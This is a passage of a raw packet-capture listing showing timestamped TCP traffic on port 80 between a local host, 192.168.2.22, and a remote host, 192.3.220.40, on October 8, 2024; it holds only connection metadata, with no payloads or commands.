                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846851110 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846860886 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846870899 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846882105 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846890926 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846900940 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846904993 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846913099 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846923113 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846924067 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846935987 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846946001 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846946955 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846977949 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847279072 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847289085 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847299099 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847309113 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847318888 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847327948 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847332001 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847340107 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847349882 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847357988 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847361088 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847371101 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847371101 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847388983 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847412109 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.847434998 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848433018 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848443985 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848453999 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848459005 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848465919 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848474979 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848484993 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848495960 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848505974 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848516941 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848517895 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848529100 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848540068 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848540068 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848552942 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848562002 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848582983 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848596096 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848608017 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848618984 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848629951 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848639965 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848649025 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848651886 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848663092 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848671913 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848676920 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848683119 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848691940 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848697901 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848702908 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848712921 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848723888 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848723888 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848735094 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848737955 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.848763943 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852116108 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852157116 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852163076 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852169037 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852210999 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852250099 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852261066 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852271080 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852283001 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852300882 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852320910 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852428913 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852442026 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852452993 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852463961 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852474928 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852485895 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852488041 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852502108 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852523088 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852525949 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852538109 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852549076 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852559090 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852581978 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852714062 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852724075 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852735043 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852746010 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852756977 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852765083 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852767944 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852778912 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852782011 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852788925 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852792025 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852799892 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852809906 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852819920 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852824926 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852832079 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852849960 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852996111 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853005886 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853018045 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853028059 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853049994 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853056908 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853058100 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853069067 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853080034 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853095055 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853099108 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853111982 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853122950 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853130102 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853133917 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853140116 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853151083 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853162050 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853173971 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853183985 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853197098 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853209972 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853219032 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853229046 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853240013 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853240967 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853251934 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853255033 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853261948 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853269100 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853283882 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853295088 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853460073 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853472948 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853497028 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853507996 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853514910 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853519917 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853530884 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853540897 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853547096 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853571892 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853751898 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853763103 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853773117 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853784084 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853795052 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853804111 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853806019 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853816032 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853825092 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853827000 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853844881 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853863955 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853868961 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853883028 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853893995 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853904009 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853913069 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853923082 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853924990 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853934050 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853945017 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853955030 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853955984 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853966951 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853974104 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853981018 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853986025 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853997946 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854007006 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854032993 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854032993 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854047060 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854084015 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854305029 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854315996 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854326963 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854336977 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854350090 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854365110 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854381084 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854449987 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854460955 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854471922 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854496956 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854500055 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854507923 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854520082 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854531050 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854540110 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854546070 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854551077 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854561090 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854562998 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854573011 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854583979 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854593992 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854597092 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854604006 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854614019 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854626894 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854654074 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854831934 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854844093 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854855061 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854866028 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854886055 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854897976 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854954004 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854965925 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854975939 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854985952 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854995966 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.855004072 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.855005980 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.855016947 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.855025053 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.855027914 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.855038881 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.855047941 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.855051041 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.855065107 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.855086088 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.943723917 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.943758011 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.943769932 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.943803072 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.943864107 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.943876982 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.943887949 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.943901062 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.943903923 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.943912029 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.943938971 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944008112 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944013119 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944020033 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944055080 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944190025 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944201946 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944211960 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944224119 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944235086 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944247007 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944250107 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944258928 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944261074 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944272041 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944294930 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944464922 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944475889 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944487095 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944498062 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944502115 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944509983 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944523096 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944547892 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944585085 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944597006 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944607973 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944619894 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944628954 CEST8049177192.3.220.40192.168.2.22
